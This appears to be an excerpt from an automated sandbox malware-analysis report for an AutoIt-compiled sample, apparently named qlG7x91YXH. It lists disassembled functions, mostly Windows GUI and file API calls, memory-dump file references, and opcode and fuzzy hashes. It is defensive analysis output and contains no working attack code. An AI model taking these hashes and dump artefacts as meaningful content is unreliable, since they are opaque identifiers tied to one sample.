                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                              • String ID:
                                              • API String ID: 2797419724-0
                                              • Opcode ID: d5950c1513dcb8cb0426d99916e63f5e982c93b2354effad504f97e8f6618199
                                              • Instruction ID: d2a13afea0f122b417178508cd9c5087f4072e5823c39b74fed391f877dc3487
                                              • Opcode Fuzzy Hash: d5950c1513dcb8cb0426d99916e63f5e982c93b2354effad504f97e8f6618199
                                              • Instruction Fuzzy Hash: 1BD012742403087BEE103B61EC0BF597A19DB44790F508120F604391D2CA7374D09678
                                              Function 00D909D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00D903EE), ref: 00D909DA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 54ae55a1c6cbb806820630f8b21a404286d4bff9385bb8f128f51d4e58527dfd
                                              • Instruction ID: 585ea51ac33ea08f0e4f2e61d5815cfb19836345bc084c61791ce55fb98e6b92
                                              • Opcode Fuzzy Hash: 54ae55a1c6cbb806820630f8b21a404286d4bff9385bb8f128f51d4e58527dfd
                                              • Instruction Fuzzy Hash:
                                              Function 00D9781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0
                                              • API String ID: 0-4108050209
                                              • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                              • Instruction ID: 3cc9897820b05c9dbf03138267b1a58f2881726391cadb7b976dbd90dffb2d89
                                              • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                              • Instruction Fuzzy Hash: 6451787173C7056BDF388568885E7FE6789DB12344F1C060AD8C6DB282C615DE02E776
                                              Function 00DE2046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0&
                                              • API String ID: 0-2523485602
                                              • Opcode ID: adf816de322d349c8a68df28eb1732db6c04538df858b2dce16ce71dbd71e6e4
                                              • Instruction ID: 8c6d9758645ec26dc97a436b17703e0f412856ad70c8a1408e5ddaf1b018c5c1
                                              • Opcode Fuzzy Hash: adf816de322d349c8a68df28eb1732db6c04538df858b2dce16ce71dbd71e6e4
                                              • Instruction Fuzzy Hash: C521BB327205158BD728CF7AC81367E73E9A754310F59866EE4A7D37D0DE35A904C790
                                              Function 00DA6DD9 Relevance: .6, Instructions: 637COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f9eaefc9c44cd7239a8021744c2e8cbf9e4d682100aeb46f13e037c191f55645
                                              • Instruction ID: 31382ca5f7146735eaf0b8807b8876996aebb03355c5e4e73142bae111ce9fe5
                                              • Opcode Fuzzy Hash: f9eaefc9c44cd7239a8021744c2e8cbf9e4d682100aeb46f13e037c191f55645
                                              • Instruction Fuzzy Hash: 32322632D29F014DD7239A39DC22336A689AFB73C5F15D73BF81AB59A5EB29C4834100
                                              Function 00D8CC39 Relevance: .6, Instructions: 635COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 51227a0baec85f2de733fc1136e1d4ad67e48fea53dfc383eab77a091dd51dd6
                                              • Instruction ID: ae2d65ddaf484d134daa6faeeb6e1ea8ac4d07fbb6fa3fdef1a29004cbb8fada
                                              • Opcode Fuzzy Hash: 51227a0baec85f2de733fc1136e1d4ad67e48fea53dfc383eab77a091dd51dd6
                                              • Instruction Fuzzy Hash: DE32F331A20106DBCF28DA69C494F7D7BA1EB85300F2CA56ED68EDB291D630DD81DB71
                                              Function 00D77920 Relevance: .6, Instructions: 563COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f723ee9a328e331186105c4586151e395ea5bb0bddb6b970abcc9145e1d0d330
                                              • Instruction ID: a0061146567d77a81509617e8b0e83254c39c11db579d5eeeb2258ddd809b42c
                                              • Opcode Fuzzy Hash: f723ee9a328e331186105c4586151e395ea5bb0bddb6b970abcc9145e1d0d330
                                              • Instruction Fuzzy Hash: 43228C70A04609DFDF14DF68D881AEEB7F5FF48300F148529E85AA7295EB36A914CB70
                                              Function 00D791C0 Relevance: .5, Instructions: 475COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0a45eab6adc637837ed9ea3a694a2befbd56d2bd1d5d0460a3a63f0eeaa2ce13
                                              • Instruction ID: 6c75b722aa104448189c91545a4b671bb677adf04544010bc7d86d5f3d731155
                                              • Opcode Fuzzy Hash: 0a45eab6adc637837ed9ea3a694a2befbd56d2bd1d5d0460a3a63f0eeaa2ce13
                                              • Instruction Fuzzy Hash: 9C02A7B1A00209EFDF05DF64D881AEDBBB5FF44300F548169E85A9B291E731EE14CBA5
                                              Function 00D919B0 Relevance: .2, Instructions: 240COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                              • Instruction ID: fcb1c9aeca6dcf3a3b317a95c8989a25647f3047a50896d0f3fecf36c6309d51
                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                              • Instruction Fuzzy Hash: 5791437A2090A34EDF2D467A857403EFFE15A923A671E079ED4F2CA1C1FE24C959D630
                                              Function 00D97A4A Relevance: .2, Instructions: 237COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3109ff2ee8ca8b4f02b99ee37771e57db9210a8cdb1c2818b1b9299f24cd1666
                                              • Instruction ID: 067b2f85ffc0886e42d0094e3538fcd00a6418302e68eb8c5fd1c59ff3df0d08
                                              • Opcode Fuzzy Hash: 3109ff2ee8ca8b4f02b99ee37771e57db9210a8cdb1c2818b1b9299f24cd1666
                                              • Instruction Fuzzy Hash: A1618B7173870966DF389A2C8C95BBF2395EF41708F1C091AE88BDB291D611DE42C375
                                              Function 00D97CA7 Relevance: .2, Instructions: 237COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d0e231398b0a1d00aeb16456faa4623df0093474ba6e9f44a736c14a0461fdc2
                                              • Instruction ID: c955a02a379474026366efc8d34eac10ebdf72ccba8ed674d3f47d86313c567a
                                              • Opcode Fuzzy Hash: d0e231398b0a1d00aeb16456faa4623df0093474ba6e9f44a736c14a0461fdc2
                                              • Instruction Fuzzy Hash: 08615A7173870AE7DF385A288855BBF2394EF42704F1C0959F983DB281EA12DD429375
                                              Function 00D91706 Relevance: .2, Instructions: 232COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                              • Instruction ID: b3db60f6c9e26dbe9543f9f396afb080d5d352951cebb86f5f88d4bea8ff4ab5
                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                              • Instruction Fuzzy Hash: C881757A6090A35DDF6E427A853443EFFE15A923A131E079ED4F2CB1C1EE24D558EA30
                                              Function 00DF2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00DF2B30
                                              • DeleteObject.GDI32(00000000), ref: 00DF2B43
                                              • DestroyWindow.USER32 ref: 00DF2B52
                                              • GetDesktopWindow.USER32 ref: 00DF2B6D
                                              • GetWindowRect.USER32(00000000), ref: 00DF2B74
                                              • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00DF2CA3
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00DF2CB1
                                              • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2CF8
                                              • GetClientRect.USER32(00000000,?), ref: 00DF2D04
                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DF2D40
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D62
                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D75
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D80
                                              • GlobalLock.KERNEL32(00000000), ref: 00DF2D89
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2D98
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00DF2DA1
                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2DA8
                                              • GlobalFree.KERNEL32(00000000), ref: 00DF2DB3
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DF2DC5
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E0FC38,00000000), ref: 00DF2DDB
                                              • GlobalFree.KERNEL32(00000000), ref: 00DF2DEB
                                              • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00DF2E11
                                              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00DF2E30
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF2E52
                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DF303F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                              • String ID: $AutoIt v3$DISPLAY$static
                                              • API String ID: 2211948467-2373415609
                                              • Opcode ID: f9c69c84fec21cd2fd762d7c7bb118468bf4d5b0b14ac52b06e90514f443ff37
                                              • Instruction ID: dd00cd08bd637835c9499ba2ad0ce9f35244b10c9ff835e2b62b02f92aaefc34
                                              • Opcode Fuzzy Hash: f9c69c84fec21cd2fd762d7c7bb118468bf4d5b0b14ac52b06e90514f443ff37
                                              • Instruction Fuzzy Hash: 78029B71900208AFDB14DFA5CC89EBE7BB9EF48710F148258F915AB2A1DB31AD45CB70
                                              Function 00E070D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetTextColor.GDI32(?,00000000), ref: 00E0712F
                                              • GetSysColorBrush.USER32(0000000F), ref: 00E07160
                                              • GetSysColor.USER32(0000000F), ref: 00E0716C
                                              • SetBkColor.GDI32(?,000000FF), ref: 00E07186
                                              • SelectObject.GDI32(?,?), ref: 00E07195
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00E071C0
                                              • GetSysColor.USER32(00000010), ref: 00E071C8
                                              • CreateSolidBrush.GDI32(00000000), ref: 00E071CF
                                              • FrameRect.USER32(?,?,00000000), ref: 00E071DE
                                              • DeleteObject.GDI32(00000000), ref: 00E071E5
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00E07230
                                              • FillRect.USER32(?,?,?), ref: 00E07262
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E07284
                                                • Part of subcall function 00E073E8: GetSysColor.USER32(00000012), ref: 00E07421
                                                • Part of subcall function 00E073E8: SetTextColor.GDI32(?,?), ref: 00E07425
                                                • Part of subcall function 00E073E8: GetSysColorBrush.USER32(0000000F), ref: 00E0743B
                                                • Part of subcall function 00E073E8: GetSysColor.USER32(0000000F), ref: 00E07446
                                                • Part of subcall function 00E073E8: GetSysColor.USER32(00000011), ref: 00E07463
                                                • Part of subcall function 00E073E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E07471
                                                • Part of subcall function 00E073E8: SelectObject.GDI32(?,00000000), ref: 00E07482
                                                • Part of subcall function 00E073E8: SetBkColor.GDI32(?,00000000), ref: 00E0748B
                                                • Part of subcall function 00E073E8: SelectObject.GDI32(?,?), ref: 00E07498
                                                • Part of subcall function 00E073E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00E074B7
                                                • Part of subcall function 00E073E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E074CE
                                                • Part of subcall function 00E073E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00E074DB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                              • String ID:
                                              • API String ID: 4124339563-0
                                              • Opcode ID: 88d0802071f8f9db61b0291e0b0287f36a0f12c27f5f0e59a1ab8e48725c0f7f
                                              • Instruction ID: 39c64b8435c828e1df104e01203b23ebb88e18eb7c55f6203d638aac5986ea1b
                                              • Opcode Fuzzy Hash: 88d0802071f8f9db61b0291e0b0287f36a0f12c27f5f0e59a1ab8e48725c0f7f
                                              • Instruction Fuzzy Hash: C9A1A172409301AFDB119F61DC48E5B7BA9FF49320F201B19F9A2B61E1D732E988CB51
                                              Function 00DF2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(00000000), ref: 00DF273E
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DF286A
                                              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00DF28A9
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00DF28B9
                                              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00DF2900
                                              • GetClientRect.USER32(00000000,?), ref: 00DF290C
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00DF2955
                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DF2964
                                              • GetStockObject.GDI32(00000011), ref: 00DF2974
                                              • SelectObject.GDI32(00000000,00000000), ref: 00DF2978
                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00DF2988
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DF2991
                                              • DeleteDC.GDI32(00000000), ref: 00DF299A
                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DF29C6
